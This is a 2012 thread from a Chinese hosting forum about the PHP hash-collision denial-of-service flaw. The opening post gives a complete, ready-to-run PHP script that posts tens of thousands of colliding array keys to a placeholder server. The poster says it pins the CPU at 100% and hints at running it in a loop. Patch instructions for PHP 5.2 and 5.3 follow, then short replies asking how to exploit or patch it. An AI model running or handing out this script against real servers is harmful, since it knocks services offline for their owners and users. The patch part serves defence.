设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 php最新漏洞hash dos攻击实例及解决方法
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
123下一页
返回列表 发新帖
查看: 4879|回复: 29

[疑问] php最新漏洞hash dos攻击实例及解决方法

[复制链接]
毛毛虫
发表于 2012-1-3 18:46:45 | 显示全部楼层 |阅读模式
本帖最后由 毛毛虫 于 2012-1-3 18:50 编辑
  1. <?php
  2. $host = 'xxx.com/test.php';
  3. $data = '';
  4. $size = pow(2, 15);
  5. for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
  6. {
  7. $data .= '&array[' . $key . ']=0';
  8. }
  9. $ret = curl($host, ltrim($data,'&'));
  10. var_dump($ret);
  11. function curl($url, $post, $timeout = 30){
  12. $ch = curl_init();
  13. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  14. curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
  15. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
  16. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  17. curl_setopt($ch, CURLOPT_URL, $url);
  18. curl_setopt($ch, CURLOPT_POST, true);
  19. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  20. $output = curl_exec($ch);
  21. if ($output === false) return false;
  22. $info = curl_getinfo($ch);
  23. $http_code = $info['http_code'];
  24. if ($http_code == 404) return false;
  25. curl_close($ch);
  26. return $output;
  27. }
  28. ?>
复制代码
执行这个php程序会使服务器cpu直接占用100%,如果循环,你懂的。
下面是修补的方法:
php-5.2.x:
到这里github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars下载对应的补丁版本,进入php目录,执行patch -p1 < php-5.2.*-max-input-vars.patch打上补丁,之后make 和make install即可。
php-5.3.x:
php-5.3.x没有提供相应的补丁版本,laruence建议使用php5.3.x的升级到5.3.9RC4或者按照php5.2.x的补丁修改适应成php5.3.x的补丁。下面我们提供直接修改文件的方法,虽然比较麻烦。
1、修改/main/main.c文件,把STD_PHP_INI_ENTRY宏加到main.c的PHP_INI_BEGIN()和PHP_INI_END()宏之间来注册PHP INI指令:
  1. STD_PHP_INI_ENTRY(" max_input_vars", "1000", PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateLongGEZero, max_input_vars, php_core_globals, core_globals)
复制代码
2、修改文件/main/php_globals.h,_php_core_globals结构体内加上:
  1. long max_input_vars;
复制代码
3、修改文件/main/php_variables.c,在:
  1. zend_symtable_update(symtable1, escaped_index, index_len + 1, &gpc_element, sizeof(zval *), (void **) &gpc_element_p);
复制代码
之前加入:
  1. if (zend_hash_num_elements(symtable1) >= PG(max_input_vars)) {
  2. php_error_docref(NULL TSRMLS_CC, E_ERROR, "Input variables exceeded %ld. To increase the limit change max_input_vars in php.ini.", PG(max_input_vars));
  3. }
复制代码
一共有两处,第一处数组中的键时的操作,而第二处是普通变量时的操作。

评分

参与人数 3威望 +40 收起 理由
ali727 + 5 能否远程攻击?还是只对执行的本机有效?.
wusir + 15 赞一个!
哈P哥 + 20 技术帖啊

查看全部评分

回复

举报

easyboy
发表于 2012-1-3 18:47:58 | 显示全部楼层
其实呢。。这个大半年前就爆出了 而且有补丁了
回复 支持 反对

举报

johnnyfu829
发表于 2012-1-3 18:48:10 | 显示全部楼层
回复 支持 反对

举报

Captain
发表于 2012-1-3 18:48:22 | 显示全部楼层
windows下的补丁怎么打
回复 支持 反对

举报

毛毛虫
 楼主| 发表于 2012-1-3 18:49:45 | 显示全部楼层
easyboy 发表于 2012-1-3 18:47
其实呢。。这个大半年前就爆出了 而且有补丁了

补丁是前几天才有的
回复 支持 反对

举报

查无此人
发表于 2012-1-3 18:50:51 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

crazyfeng
发表于 2012-1-3 18:53:57 | 显示全部楼层
怎么利用?
回复 支持 反对

举报

mslxd
发表于 2012-1-3 18:54:36 | 显示全部楼层
没搞懂啊,,,,
回复 支持 反对

举报

火雪心
发表于 2012-1-3 18:56:12 | 显示全部楼层
怎么打补丁??
回复 支持 反对

举报

cquyf
发表于 2012-1-3 18:56:23 | 显示全部楼层
最怕洞洞了
回复 支持 反对

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-1-20 03:45 , Processed in 0.076112 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表